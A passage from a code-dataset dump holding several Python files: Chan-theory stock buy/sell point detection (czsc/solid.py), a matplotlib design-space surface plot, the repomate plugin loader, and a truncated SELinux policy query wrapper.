\"\"\"确定某一级别一买\n 注意:如果本级别上一级别的 ka 不存在,无法识别本级别一买,返回 `无操作` !!!\n\n 一买识别逻辑:\n 1)必须:上级别最后一个线段标记和最后一个笔标记重合且为底分型;\n 2)必须:上级别最后一个向下线段内部笔标记数量大于等于6,且本级别最后一个线段标记为底分型;\n 3)必须:本级别向下线段背驰 或 本级别向下笔背驰;\n\n 4)辅助:下级别向下线段背驰 或 下级别向下笔背驰。\n\n :param ka: KlineAnalyze\n 本级别\n :param ka1: KlineAnalyze\n 上级别\n :param ka2: KlineAnalyze\n 下级别,默认为 None\n :param pf: bool\n pf 为 precision first 的缩写, 控制是否使用 `高精度优先模式` ,默认为 False ,即 `高召回优先模式`。\n 在 `高精度优先模式` 下,会充分利用辅助判断条件提高识别准确率。\n\n :return: dict\n \"\"\"\n detail = {\n \"标的代码\": ka.symbol,\n 
\"操作提示\": \"无操作\",\n \"出现时间\": None,\n \"基准价格\": None,\n \"其他信息\": None\n }\n\n if not isinstance(ka1, KlineAnalyze):\n return detail\n\n # 上级别最后一个线段标记和最后一个笔标记重合且为底分型;\n if len(ka1.xd) >= 2 and ka1.xd[-1]['xd'] == ka1.bi[-1]['bi'] \\\n and ka1.xd[-1]['fx_mark'] == ka1.bi[-1]['fx_mark'] == 'd':\n bi_inside = [x for x in ka1.bi if ka1.xd[-2]['dt'] <= x['dt'] <= ka1.xd[-1]['dt']]\n\n # 上级别最后一个向下线段内部笔标记数量大于等于6,且本级别最后一个线段标记为底分型;\n if len(bi_inside) >= 6 and ka.xd[-1]['fx_mark'] == 'd':\n # 本级别向下线段背驰 或 本级别向下笔背驰;\n if (ka.xd_bei_chi() or\n (ka.bi[-1]['fx_mark'] == 'd' and ka.bi_bei_chi())):\n detail['操作提示'] = \"一买\"\n detail['出现时间'] = ka.xd[-1]['dt']\n detail['基准价格'] = ka.xd[-1]['xd']\n\n if pf and detail[\"操作提示\"] == \"一买\" and isinstance(ka2, KlineAnalyze):\n # 下级别线段背驰 或 下级别笔背驰\n if not ((ka2.xd[-1]['fx_mark'] == 'd' and ka2.xd_bei_chi()) or\n (ka2.bi[-1]['fx_mark'] == 'd' and ka2.bi_bei_chi())):\n detail['操作提示'] = \"无操作\"\n return detail\n\n\ndef is_first_sell(ka, ka1, ka2=None, pf=False):\n \"\"\"确定某一级别一卖\n\n 注意:如果本级别上一级别的 ka 不存在,无法识别本级别一卖,返回 `无操作` !!!\n\n 一卖识别逻辑:\n 1)必须:上级别最后一个线段标记和最后一个笔标记重合且为顶分型;\n 2)必须:上级别最后一个向上线段内部笔标记数量大于等于6,且本级别最后一个线段标记为顶分型;\n 3)必须:本级别向上线段背驰 或 本级别向上笔背驰;\n\n 4)辅助:下级别向上线段背驰 或 下级别向上笔背驰。\n\n :param ka: KlineAnalyze\n 本级别\n :param ka1: KlineAnalyze\n 上级别\n :param ka2: KlineAnalyze\n 下级别,默认为 None\n :param pf: bool\n pf 为 precision first 的缩写, 控制是否使用 `高精度优先模式` ,默认为 False ,即 `高召回优先模式`。\n 在 `高精度优先模式` 下,会充分利用辅助判断条件提高识别准确率。\n\n :return: dict\n \"\"\"\n detail = {\n \"标的代码\": ka.symbol,\n \"操作提示\": \"无操作\",\n \"出现时间\": None,\n \"基准价格\": None,\n \"其他信息\": None\n }\n\n if not isinstance(ka1, KlineAnalyze):\n return detail\n\n # 上级别最后一个线段标记和最后一个笔标记重合且为顶分型;\n if len(ka1.xd) >= 2 and ka1.xd[-1]['xd'] == ka1.bi[-1]['bi'] \\\n and ka1.xd[-1]['fx_mark'] == ka1.bi[-1]['fx_mark'] == 'g':\n bi_inside = [x for x in ka1.bi if ka1.xd[-2]['dt'] <= x['dt'] <= ka1.xd[-1]['dt']]\n\n # 上级别最后一个向上线段内部笔标记数量大于等于6,且本级别最后一个线段标记为顶分型;\n if len(bi_inside) >= 6 and ka.xd[-1]['fx_mark'] == 'g':\n\n # 本级别向上线段背驰 或 本级别向上笔背驰\n if (ka.xd_bei_chi() or\n (ka.bi[-1]['fx_mark'] == 'g' and ka.bi_bei_chi())):\n detail['操作提示'] = \"一卖\"\n detail['出现时间'] = ka.xd[-1]['dt']\n detail['基准价格'] = ka.xd[-1]['xd']\n\n if pf and detail[\"操作提示\"] == \"一卖\" and isinstance(ka2, KlineAnalyze):\n # 下级别线段背驰 或 下级别笔背驰\n if not ((ka2.xd[-1]['fx_mark'] == 'g' and ka2.xd_bei_chi()) or\n (ka2.bi[-1]['fx_mark'] == 'g' and ka2.bi_bei_chi())):\n detail['操作提示'] = \"无操作\"\n return detail\n\n\ndef is_second_buy(ka, ka1, ka2=None, pf=False):\n \"\"\"确定某一级别二买\n\n 注意:如果本级别上一级别的 ka 不存在,无法识别本级别二买,返回 `无操作` !!!\n\n 二买识别逻辑:\n 1)必须:上级别最后一个线段标记和最后一个笔标记都是底分型;\n 2)必须:上级别最后一个向下线段内部笔标记数量大于等于6,且本级别最后一个线段标记为底分型,不创新低;\n 3)必须:上级别最后一个线段标记后有且只有三个笔标记,且上级别向下笔不创新低;\n\n 4)辅助:下级别向下线段背驰 或 下级别向下笔背驰\n\n :param ka: KlineAnalyze\n 本级别\n :param ka1: KlineAnalyze\n 上级别\n :param ka2: KlineAnalyze\n 下级别,默认为 None\n :param pf: bool\n pf 为 precision first 的缩写, 控制是否使用 `高精度优先模式` ,默认为 False ,即 `高召回优先模式`。\n 在 `高精度优先模式` 下,会充分利用辅助判断条件提高识别准确率。\n\n :return: dict\n \"\"\"\n detail = {\n \"标的代码\": ka.symbol,\n \"操作提示\": \"无操作\",\n \"出现时间\": None,\n \"基准价格\": None,\n \"其他信息\": None\n }\n\n if not isinstance(ka1, KlineAnalyze):\n return detail\n\n # 上级别最后一个线段标记和最后一个笔标记都是底分型;\n if len(ka1.xd) >= 2 and ka1.xd[-1]['fx_mark'] == ka1.bi[-1]['fx_mark'] == 'd':\n bi_inside = [x for x in ka1.bi if ka1.xd[-2]['dt'] <= x['dt'] <= ka1.xd[-1]['dt']]\n\n # 上级别最后一个向上线段内部笔标记数量大于等于6,且本级别最后一个线段标记为底分型,不创新低;\n if len(bi_inside) >= 6 and ka.xd[-1]['fx_mark'] == 'd' \\\n and ka.xd[-1][\"xd\"] > ka.xd[-3]['xd']:\n\n # 
上级别最后一个线段标记后有且只有三个笔标记,且上级别向下笔不创新低;\n            bi_next = [x for x in ka1.bi if x['dt'] >= ka1.xd[-1]['dt']]\n            if len(bi_next) == 3 and bi_next[-1]['fx_mark'] == 'd' \\\n                    and bi_next[-1]['bi'] > bi_next[-3]['bi']:\n                detail['操作提示'] = \"二买\"\n                detail['出现时间'] = ka.xd[-1]['dt']\n                detail['基准价格'] = ka.xd[-1]['xd']\n\n    if pf and detail[\"操作提示\"] == \"二买\" and isinstance(ka2, KlineAnalyze):\n        # 下级别向下线段背驰 或 下级别向下笔背驰\n        if not ((ka2.xd[-1]['fx_mark'] == 'd' and ka2.xd_bei_chi()) or\n                (ka2.bi[-1]['fx_mark'] == 'd' and ka2.bi_bei_chi())):\n            detail['操作提示'] = \"无操作\"\n    return detail\n\n\ndef is_second_sell(ka, ka1, ka2=None, pf=False):\n    \"\"\"确定某一级别二卖,包括类二卖\n\n    注意:如果本级别上一级别的 ka 不存在,无法识别本级别二卖,返回 `无操作` !!!\n\n    二卖识别逻辑:\n    1)必须:上级别最后一个线段标记和最后一个笔标记都是顶分型;\n    2)必须:上级别最后一个向上线段内部笔标记数量大于等于6,且本级别最后一个线段标记为顶分型,不创新高;\n    3)必须:上级别最后一个线段标记后有且只有三个笔标记,且上级别向上笔不创新高;\n\n    4)辅助:下级别向上线段背驰 或 下级别向上笔背驰\n\n    :param ka: KlineAnalyze\n        本级别\n    :param ka1: KlineAnalyze\n        上级别\n    :param ka2: KlineAnalyze\n        下级别,默认为 None\n    :param pf: bool\n        pf 为 precision first 的缩写, 控制是否使用 `高精度优先模式` ,默认为 False ,即 `高召回优先模式`。\n        在 `高精度优先模式` 下,会充分利用辅助判断条件提高识别准确率。\n\n    :return: dict\n    \"\"\"\n    detail = {\n        \"标的代码\": ka.symbol,\n        \"操作提示\": \"无操作\",\n        \"出现时间\": None,\n        \"基准价格\": None,\n        \"其他信息\": None\n    }\n\n    if not isinstance(ka1, KlineAnalyze):\n        return detail\n\n    # 上级别最后一个线段标记和最后一个笔标记都是顶分型\n    if len(ka1.xd) >= 2 and ka1.xd[-1]['fx_mark'] == ka1.bi[-1]['fx_mark'] == 'g':\n        bi_inside = [x for x in ka1.bi if ka1.xd[-2]['dt'] <= x['dt'] <= ka1.xd[-1]['dt']]\n\n        # 上级别最后一个向上线段内部笔标记数量大于等于6,且本级别最后一个线段标记为顶分型,不创新高\n        if len(bi_inside) >= 6 and ka.xd[-1]['fx_mark'] == 'g' \\\n                and ka.xd[-1][\"xd\"] < ka.xd[-3]['xd']:\n\n            # 上级别最后一个线段标记后有且只有三个笔标记,且上级别向上笔不创新高\n            bi_next = [x for x in ka1.bi if x['dt'] >= ka1.xd[-1]['dt']]\n            if len(bi_next) == 3 and bi_next[-1]['fx_mark'] == 'g' \\\n                    and bi_next[-1]['bi'] < bi_next[-3]['bi']:\n                detail['操作提示'] = \"二卖\"\n                detail['出现时间'] = ka.xd[-1]['dt']\n                detail['基准价格'] = ka.xd[-1]['xd']\n\n    if pf and detail[\"操作提示\"] == \"二卖\" and isinstance(ka2, KlineAnalyze):\n        # 下级别向上线段背驰 或 下级别向上笔背驰\n        if not ((ka2.xd[-1]['fx_mark'] == 'g' and ka2.xd_bei_chi()) or\n                (ka2.bi[-1]['fx_mark'] == 'g' and ka2.bi_bei_chi())):\n            detail['操作提示'] = \"无操作\"\n    return detail\n\n\ndef is_third_buy(ka, ka1=None, ka2=None, pf=False):\n    \"\"\"确定某一级别三买\n\n    第三类买点: 一个第三类买点,至少需要有5段次级别的走势,前三段构成中枢,第四段离开中枢,第5段不跌回中枢。\n\n    三买识别逻辑:\n    1)必须:本级别有6个以上线段标记,且最后一个线段标记为底分型;\n    2)必须:前三段有价格重叠部分,构成中枢;\n    3)必须:第4段比第2段新高无背驰,第5段不跌回中枢;\n\n    4)辅助:向上中枢数量小于等于3\n\n    :param ka: KlineAnalyze\n        本级别\n    :param ka1: KlineAnalyze\n        上级别\n    :param ka2: KlineAnalyze\n        下级别,默认为 None\n    :param pf: bool\n        pf 为 precision first 的缩写, 控制是否使用 `高精度优先模式` ,默认为 False ,即 `高召回优先模式`。\n        在 `高精度优先模式` 下,会充分利用辅助判断条件提高识别准确率。\n\n    :return: dict\n    \"\"\"\n    detail = {\n        \"标的代码\": ka.symbol,\n        \"操作提示\": \"无操作\",\n        \"出现时间\": None,\n        \"基准价格\": None,\n        \"其他信息\": None\n    }\n\n    # 本级别有6个以上线段标记,且最后一个线段标记为底分型;\n    if len(ka.xd) >= 6 and ka.xd[-1]['fx_mark'] == 'd':\n\n        # 前三段有价格重叠部分,构成中枢;\n        zs_g = min([x['xd'] for x in ka.xd[-6:-2] if x['fx_mark'] == \"g\"])\n        zs_d = max([x['xd'] for x in ka.xd[-6:-2] if x['fx_mark'] == \"d\"])\n        if zs_g > zs_d:\n\n            # 第4段比第2段有新高或新低,且无背驰,第5段不跌回中枢;\n            direction = 'up'\n            zs1 = {\"start_dt\": ka.xd[-3]['dt'], \"end_dt\": ka.xd[-2]['dt'], \"direction\": direction}\n            zs2 = {\"start_dt\": ka.xd[-5]['dt'], \"end_dt\": ka.xd[-4]['dt'], \"direction\": direction}\n            if ka.xd[-2]['xd'] > ka.xd[-4]['xd'] \\\n                    and not is_bei_chi(ka, zs1, zs2, mode='xd') \\\n                    and ka.xd[-1]['xd'] > zs_g:\n                detail['操作提示'] = '三买'\n                detail['出现时间'] = ka.xd[-1]['dt']\n                detail['基准价格'] 
= ka.xd[-1]['xd']\n\n    if pf and detail['操作提示'] == '三买':\n        # 向上中枢数量小于等于3\n        un = ka.up_zs_number()\n        if un > 3:\n            detail['操作提示'] = '无操作'\n\n    if isinstance(ka1, KlineAnalyze):\n        pass\n\n    if isinstance(ka2, KlineAnalyze):\n        pass\n    return detail\n\n\ndef is_third_sell(ka, ka1=None, ka2=None, pf=False):\n    \"\"\"确定某一级别三卖\n\n    第三类卖点: 一个第三类卖点,至少需要有5段次级别的走势,前三段构成中枢,第四段离开中枢,第5段不升破中枢的低点。\n\n    三卖识别逻辑:\n    1)必须:本级别有6个以上线段标记,且最后一个线段标记为顶分型;\n    2)必须:前三段有价格重叠部分,构成中枢;\n    3)必须:第4段比第2段新低无背驰,第5段不升回中枢;\n\n    4)辅助:向下中枢数量小于等于3\n\n    :param ka: KlineAnalyze\n        本级别\n    :param ka1: KlineAnalyze\n        上级别\n    :param ka2: KlineAnalyze\n        下级别,默认为 None\n    :param pf: bool\n        pf 为 precision first 的缩写, 控制是否使用 `高精度优先模式` ,默认为 False ,即 `高召回优先模式`。\n        在 `高精度优先模式` 下,会充分利用辅助判断条件提高识别准确率。\n\n    :return: dict\n    \"\"\"\n    detail = {\n        \"标的代码\": ka.symbol,\n        \"操作提示\": \"无操作\",\n        \"出现时间\": None,\n        \"基准价格\": None,\n        \"其他信息\": None\n    }\n\n    # 本级别有6个以上线段标记,且最后一个线段标记为顶分型;\n    if len(ka.xd) >= 6 and ka.xd[-1]['fx_mark'] == 'g':\n\n        # 前三段有价格重叠部分,构成中枢;\n        zs_g = min([x['xd'] for x in ka.xd[-6:-2] if x['fx_mark'] == \"g\"])\n        zs_d = max([x['xd'] for x in ka.xd[-6:-2] if x['fx_mark'] == \"d\"])\n        if zs_g > zs_d:\n\n            # 第4段比第2段新低无背驰,第5段不升回中枢;\n            direction = 'down'\n            zs1 = {\"start_dt\": ka.xd[-3]['dt'], \"end_dt\": ka.xd[-2]['dt'], \"direction\": direction}\n            zs2 = {\"start_dt\": ka.xd[-5]['dt'], \"end_dt\": ka.xd[-4]['dt'], \"direction\": direction}\n            if ka.xd[-2]['xd'] < ka.xd[-4]['xd'] \\\n                    and not is_bei_chi(ka, zs1, zs2, mode='xd') \\\n                    and ka.xd[-1]['xd'] < zs_d:\n                detail['操作提示'] = '三卖'\n                detail['出现时间'] = ka.xd[-1]['dt']\n                detail['基准价格'] = ka.xd[-1]['xd']\n\n    if pf and detail['操作提示'] == '三卖':\n        # 向下中枢数量小于等于3\n        dn = ka.down_zs_number()\n        if dn > 3:\n            detail['操作提示'] = '无操作'\n\n    if isinstance(ka1, KlineAnalyze):\n        pass\n\n    if isinstance(ka2, KlineAnalyze):\n        pass\n    return detail\n\n\ndef is_xd_buy(ka, ka1=None, ka2=None, pf=False):\n    \"\"\"同级别分解买点,我称之为线买,即线段买点\n\n    线买识别逻辑:\n    1) 必须:本级别至少有 3 个线段标记且最后一个线段标记为底分型;\n    2) 必须:本级别向下线段背驰 或 本级别向下线段不创新低;\n\n    3) 辅助:上级别向下笔背驰 或 上级别向下笔不创新低\n    4) 辅助:下级别向下笔背驰\n\n    :param ka: KlineAnalyze\n        本级别\n    :param ka1: KlineAnalyze\n        上级别\n    :param ka2: KlineAnalyze\n        下级别,默认为 None\n    :param pf: bool\n        pf 为 precision first 的缩写, 控制是否使用 `高精度优先模式` ,默认为 False ,即 `高召回优先模式`。\n        在 `高精度优先模式` 下,会充分利用辅助判断条件提高识别准确率。\n\n    :return: dict\n    \"\"\"\n    detail = {\n        \"标的代码\": ka.symbol,\n        \"操作提示\": \"无操作\",\n        \"出现时间\": None,\n        \"基准价格\": None,\n        \"其他信息\": None\n    }\n\n    # 本级别至少有 3 个线段标记且最后一个线段标记为底分型;\n    if len(ka.xd) > 3 and ka.xd[-1]['fx_mark'] == 'd':\n\n        # 本级别向下线段背驰 或 本级别向下线段不创新低;\n        if ka.xd_bei_chi() or ka.xd[-1]['xd'] > ka.xd[-3]['xd']:\n            detail['操作提示'] = \"线买\"\n            detail['出现时间'] = ka.xd[-1]['dt']\n            detail['基准价格'] = ka.xd[-1]['xd']\n\n    if pf and detail['操作提示'] == \"线买\":\n        if isinstance(ka1, KlineAnalyze):\n            # 上级别向下笔背驰 或 上级别向下笔不创新低\n            if not (ka1.bi[-1]['fx_mark'] == 'd' and\n                    (ka1.bi[-1]['bi'] > ka1.bi[-3]['bi'] or ka1.bi_bei_chi())):\n                detail['操作提示'] = \"无操作\"\n\n        if isinstance(ka2, KlineAnalyze):\n            # 下级别向下笔背驰\n            if not (ka2.bi[-1]['fx_mark'] == 'd' and ka2.bi_bei_chi()):\n                detail['操作提示'] = \"无操作\"\n    return detail\n\n\ndef is_xd_sell(ka, ka1=None, ka2=None, pf=False):\n    \"\"\"同级别分解卖点,我称之为线卖,即线段卖点\n\n    线卖识别逻辑:\n    1) 必须:本级别至少有 3 个线段标记且最后一个线段标记为顶分型;\n    2) 必须:本级别向上线段背驰 或 本级别向上线段不创新高;\n\n    3) 辅助:上级别向上笔背驰 或 上级别向上笔不创新高\n    4) 辅助:下级别向上笔背驰\n\n    :param ka: KlineAnalyze\n        本级别\n    :param ka1: KlineAnalyze\n        上级别\n    :param ka2: KlineAnalyze\n        下级别,默认为 None\n    :param pf: bool\n        pf 为 precision first 的缩写, 控制是否使用 `高精度优先模式` ,默认为 False ,即 `高召回优先模式`。\n        在 `高精度优先模式` 下,会充分利用辅助判断条件提高识别准确率。\n\n    :return: dict\n    
\"\"\"\n    detail = {\n        \"标的代码\": ka.symbol,\n        \"操作提示\": \"无操作\",\n        \"出现时间\": None,\n        \"基准价格\": None,\n        \"其他信息\": None\n    }\n\n    # 本级别至少有 3 个线段标记且最后一个线段标记为顶分型;\n    if len(ka.xd) > 3 and ka.xd[-1]['fx_mark'] == 'g':\n\n        # 本级别向上线段背驰 或 本级别向上线段不创新高\n        if ka.xd_bei_chi() or ka.xd[-1]['xd'] < ka.xd[-3]['xd']:\n            detail['操作提示'] = \"线卖\"\n            detail['出现时间'] = ka.xd[-1]['dt']\n            detail['基准价格'] = ka.xd[-1]['xd']\n\n    if pf and detail['操作提示'] == \"线卖\":\n        if isinstance(ka1, KlineAnalyze):\n            # 上级别向上笔背驰 或 上级别向上笔不创新高\n            if not (ka1.bi[-1]['fx_mark'] == 'g' and\n                    (ka1.bi[-1]['bi'] < ka1.bi[-3]['bi'] or ka1.bi_bei_chi())):\n                detail['操作提示'] = \"无操作\"\n\n        if isinstance(ka2, KlineAnalyze):\n            # 下级别向上笔背驰\n            if not (ka2.bi[-1]['fx_mark'] == 'g' and ka2.bi_bei_chi()):\n                detail['操作提示'] = \"无操作\"\n    return detail\n\n\nbs_func = {\n    \"一买\": is_first_buy,\n    \"一卖\": is_first_sell,\n\n    \"二买\": is_second_buy,\n    \"二卖\": is_second_sell,\n\n    \"三买\": is_third_buy,\n    \"三卖\": is_third_sell,\n\n    \"线买\": is_xd_buy,\n    \"线卖\": is_xd_sell,\n    }\n\n\ndef get_sa_feature(sa):\n    signals = {\"交易标的\": sa.symbol, \"交易时间\": sa.kas['1分钟'].end_dt, \"chan_version\": 0.3}\n    for freq, ka in sa.kas.items():\n        feature = get_ka_feature(ka)\n        for k, v in feature.items():\n            signals[freq+k] = v\n    # print(signals)\n    return signals\n\n\nclass SolidAnalyze(object):\n    \"\"\"多级别(日线、30分钟、5分钟、1分钟)K线联合分析\n\n    这只是一个样例,展示如何结合多个K线级别进行买卖点分析。\n    你可以根据自己对缠论的理解,利用 KlineAnalyze 的分析结果在多个级别之间进行联合分析,找出符合自己要求的买卖点。\n    \"\"\"\n\n    def __init__(self, klines):\n        \"\"\"\n\n        :param klines: dict\n            key 为K线级别名称;value 为对应的K线数据,K线数据基本格式参考 KlineAnalyze\n            example: {\"日线\": df, \"30分钟\": df, \"5分钟\": df, \"1分钟\": df,}\n        \"\"\"\n        self.kas = dict()\n        self.freqs = list(klines.keys())\n        for freq, kline in klines.items():\n            try:\n                ka = KlineAnalyze(kline)\n                self.kas[freq] = ka\n            except:\n                self.kas[freq] = None\n                traceback.print_exc()\n        self.symbol = self.kas['1分钟'].symbol\n        self.end_dt = self.kas['1分钟'].end_dt\n        self.latest_price = self.kas['1分钟'].latest_price\n        self.bs_func = bs_func\n\n    def _get_ka(self, freq):\n        \"\"\"输入级别,返回该级别 ka,以及上一级别 ka1,下一级别 ka2\"\"\"\n        assert freq in self.freqs, \"‘%s’不在级别列表(%s)中\" % (freq, \"|\".join(self.freqs))\n        if freq == '日线':\n            ka, ka1, ka2 = self.kas['日线'], None, self.kas['30分钟']\n        elif freq == '30分钟':\n            ka, ka1, ka2 = self.kas['30分钟'], self.kas['日线'], self.kas['5分钟']\n        elif freq == '5分钟':\n            ka, ka1, ka2 = self.kas['5分钟'], self.kas['30分钟'], self.kas['1分钟']\n        elif freq == '1分钟':\n            ka, ka1, ka2 = self.kas['1分钟'], self.kas['5分钟'], None\n        else:\n            raise ValueError\n        return ka, ka1, ka2\n\n    def _m_detail(self, detail, freq):\n        detail['交易级别'] = freq\n        ka = self.kas['1分钟']\n        detail['最新时间'] = ka.end_dt\n        detail['最新价格'] = ka.latest_price\n        return detail\n\n    def check_bs(self, freq, name, pf=False, tolerance=0.03):\n        \"\"\"\n\n        :param freq: str\n            级别,可选值 1分钟、5分钟、30分钟、日线\n        :param name: str\n            买卖点名称,可选值 一买、一卖、二买、二卖、三买、三卖、线买、线卖\n        :param pf: bool\n            是否使用 `高精度优先模式`\n        :param tolerance: float\n            买卖点的价格容忍区间\n        :return:dict\n        \"\"\"\n        func = self.bs_func[name]\n        ka, ka1, ka2 = self._get_ka(freq)\n        detail = func(ka, ka1, ka2, pf)\n        if detail['操作提示'] == name:\n            detail = self._m_detail(detail, freq)\n            base_price = detail[\"基准价格\"]\n            latest_price = detail['最新价格']\n\n            if not is_in_tolerance(base_price, latest_price, tolerance):\n                detail['操作提示'] = \"无操作\"\n        return detail\n","sub_path":"czsc/solid.py","file_name":"solid.py","file_ext":"py","file_size_in_byte":23841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"643191220","text":"import numpy as 
np \nimport matplotlib.pyplot as plt \nfrom mpl_toolkits.mplot3d import Axes3D\nimport json\nimport argparse\n\ndef read_json(path):\n with open(path, 'r') as f:\n trajectory = json.load(f)\n return trajectory\n\nparser = argparse.ArgumentParser(description=\"Visualization\")\nparser.add_argument('--path', type=str, default='',\n help='saving path of search trajectory')\nparser.add_argument('--step', type=int, default=100,\n help='step for sampling loop orders')\nparser.add_argument('--fix_tiling_factor', action='store_true', default=False,\n help='whether fix the pe array')\nparser.add_argument('--fix_loop_order', action='store_true', default=False,\n help='whether fix the loop order')\nparser.add_argument('--fix_tiling', action='store_true', default=False,\n help='whether fix the tiling factors')\nargs = parser.parse_args()\n\npath1 = 'trajectory/all.json'\n\nt1 = read_json(path1)\n\nmetric = t1['metric']\nloop_order = t1['loop_order']\ntiling = t1['tiling_factor']\npe = t1['pe_array']\n\n# print(len(loop_order))\n# print(len(tiling))\n# print(len(pe))\n# input()\n\nx = list(range(16))\ny = list(range(int(len(tiling)/len(x))))\n\n\nX, Y = np.meshgrid(x, y)\n\n# Z = np.sqrt(X ** 2 + Y ** 2)\n# print(Z.shape)\n# input()\n\nZ = np.reshape(metric[:len(x)*len(y)], (len(y), len(x)))\nprint(Z.shape)\n\n\nfont_big = 20\nfont_mid = 14\nfont_small = 12\n\n# fig, ax = plt.subplots(2, 3, figsize=(10,8))\n# plt.subplots_adjust(wspace=0.2, hspace=0.35)\n\nfig = plt.figure()\nax = Axes3D(fig)\n\nax.plot_surface(X, Y, Z, rstride = 1, cstride = 1, cmap = plt.get_cmap('rainbow'))\n\nax.set_title('EDP - Design Spaced', fontsize=font_big)\nax.set_xlabel('Dataflow * Loop Order', fontsize=font_mid)\nax.set_ylabel('Tiling Factors', fontsize=font_mid)\nax.set_zlabel('EDP', fontsize=font_mid)\n\n\nplt.savefig('surface.png', bbox_inches='tight')\nplt.show()\n\n","sub_path":"hw_diff_final/visual_surface.py","file_name":"visual_surface.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"190681958","text":"\"\"\"Plugin system module.\n\nModule containing plugin system utility functions and classes.\n\n.. module:: plugin\n :synopsis: PLugin system utility functions and classes.\n\n.. moduleauthor:: Simon Larsén\n\"\"\"\n\nimport pathlib\nimport importlib\nimport sys\nfrom types import ModuleType\nfrom typing import Union, List, Optional, Iterable\n\nimport daiquiri\n\nfrom repomate import config\nfrom repomate import exception\n\nimport repomate_plug as plug\n\nLOGGER = daiquiri.getLogger(__file__)\n\nPLUGIN_QUALNAME = lambda plugin_name: \"{}.ext.{}\".format(__package__, plugin_name)\nEXTERNAL_PLUGIN_QUALNAME = lambda plugin_name: \"{}_{}.{}\".format(\n __package__, plugin_name, plugin_name)\n\n\ndef load_plugin_modules(\n config_file: Union[str, pathlib.Path] = config.DEFAULT_CONFIG_FILE,\n plugin_names: Iterable[str] = None) -> List[ModuleType]:\n \"\"\"Load plugins that are specified in the config. Try to import first from\n :py:mod:`repomate.ext`, and then from ``repomate_``. For example,\n if ``javac`` is listed as a plugin, the following imports will be attempted:\n\n .. code-block:: python\n\n # import nr 1\n from repomate.ext import javac\n\n # import nr 2\n from repomate_javac import javac\n\n Args:\n config_file: Path to the configuration file.\n plugin_names: A list of plugin names. 
Overrides the config file.\n\n Returns:\n a list of loaded modules.\n \"\"\"\n loaded_modules = []\n\n plugin_names = plugin_names or config.get_plugin_names(config_file)\n for name in plugin_names:\n plug_mod = _try_load_module(PLUGIN_QUALNAME(name)) or\\\n _try_load_module(EXTERNAL_PLUGIN_QUALNAME(name))\n if not plug_mod:\n msg = \"failed to load plugin module \" + name\n raise exception.PluginError(msg)\n loaded_modules.append(plug_mod)\n\n if loaded_modules:\n LOGGER.info(\"loaded modules {}\".format(\n [mod.__name__ for mod in loaded_modules]))\n\n return loaded_modules\n\n\ndef _try_load_module(qualname: str) -> Optional[ModuleType]:\n \"\"\"Try to load a module.\n\n Args:\n qualname: Qualified name of the module.\n\n Returns:\n the module if loaded properly, None otherwise\n \"\"\"\n try:\n return importlib.import_module(qualname)\n except ImportError:\n # ImportError in 3.5, ModuleNotFoundError in 3.6+\n # using ImportError for compatability\n return None\n\n\ndef register_plugins(modules: List[ModuleType]) -> None:\n \"\"\"Register the namespaces of the provided modules, and any plug.Plugin\n instances in them. Registers modules in reverse order as they are\n run in FIFO order.\n \n Args:\n modules: A list of modules.\n \"\"\"\n assert all([isinstance(mod, ModuleType) for mod in modules])\n for module in reversed(modules): # reverse because plugins are run FIFO\n plug.manager.register(module)\n LOGGER.info(\"registered {}\".format(module.__name__))\n for key, value in module.__dict__.items():\n if isinstance(value, type) and issubclass(\n value, plug.Plugin) and value != plug.Plugin:\n plug.manager.register(value())\n LOGGER.info(\"registered class {}\".format(key))\n\n\ndef initialize_plugins(plugin_names: List[str] = None):\n \"\"\"Load and register plugins.\n\n Args:\n plugin_names: An optional list of plugin names that overrides the\n configuration file's plugins.\n \"\"\"\n plug_modules = load_plugin_modules(plugin_names=plugin_names)\n register_plugins(plug_modules)\n","sub_path":"repomate/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":3566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"53464646","text":"from ctypes import *\nimport re\nimport os\nimport sys\n\nclass TERule:\n def __init__(self, rule):\n data = rule.split(',')\n self.flavor = data[0]\n self.sctx = data[1]\n self.tctx = data[2]\n self.tclass = data[3]\n self.perms = set((data[4].strip()).split(' '))\n self.rule = rule\n\nclass Policy:\n __Rules = None\n __FcDict = None\n __libsepolwrap = None\n __policydbP = None\n\n # Return all file_contexts entries that map to the input Type.\n def QueryFc(self, Type):\n if Type in self.__FcDict:\n return self.__FcDict[Type]\n else:\n return None\n\n # Return all attributes associated with a type if IsAttr=False or\n # all types associated with an attribute if IsAttr=True\n def QueryTypeAttribute(self, Type, IsAttr):\n init_type_iter = self.__libsepolwrap.init_type_iter\n init_type_iter.restype = c_void_p\n TypeIterP = init_type_iter(c_void_p(self.__policydbP),\n create_string_buffer(Type), c_bool(IsAttr))\n if (TypeIterP == None):\n sys.exit(\"Failed to initialize type iterator\")\n buf = create_string_buffer(2048)\n\n while True:\n ret = self.__libsepolwrap.get_type(buf, c_int(2048),\n c_void_p(self.__policydbP), c_void_p(TypeIterP))\n if ret == 0:\n yield buf.value\n continue\n if ret == 1:\n break;\n # We should never get here.\n sys.exit(\"Failed to import policy\")\n 
self.__libsepolwrap.destroy_type_iter(c_void_p(TypeIterP))\n\n # Return all TERules that match:\n # (any scontext) or (any tcontext) or (any tclass) or (any perms),\n # perms.\n # Any unspecified paramenter will match all.\n #\n # Example: QueryTERule(tcontext=[\"foo\", \"bar\"], perms=[\"entrypoint\"])\n # Will return any rule with:\n # (tcontext=\"foo\" or tcontext=\"bar\") and (\"entrypoint\" in perms)\n def QueryTERule(self, **kwargs):\n if self.__Rules is None:\n self.__InitTERules()\n for Rule in self.__Rules:\n # Match source type\n if \"scontext\" in kwargs and Rule.sctx not in kwargs['scontext']:\n continue\n # Match target type\n if \"tcontext\" in kwargs and Rule.tctx not in kwargs['tcontext']:\n continue\n # Match target class\n if \"tclass\" in kwargs and Rule.tclass not in kwargs['tclass']:\n continue\n # Match any perms\n if \"perms\" in kwargs and not bool(Rule.perms & set(kwargs['perms'])):\n continue\n yield Rule\n\n\n def __GetTERules(self, policydbP, avtabIterP):\n if self.__Rules is None:\n self.__Rules = set()\n buf = create_string_buffer(2048)\n ret = 0\n while True:\n ret = self.__libsepolwrap.get_allow_rule(buf, c_int(2048),\n c_void_p(policydbP), c_void_p(avtabIterP))\n if ret == 0:\n Rule = TERule(buf.value)\n 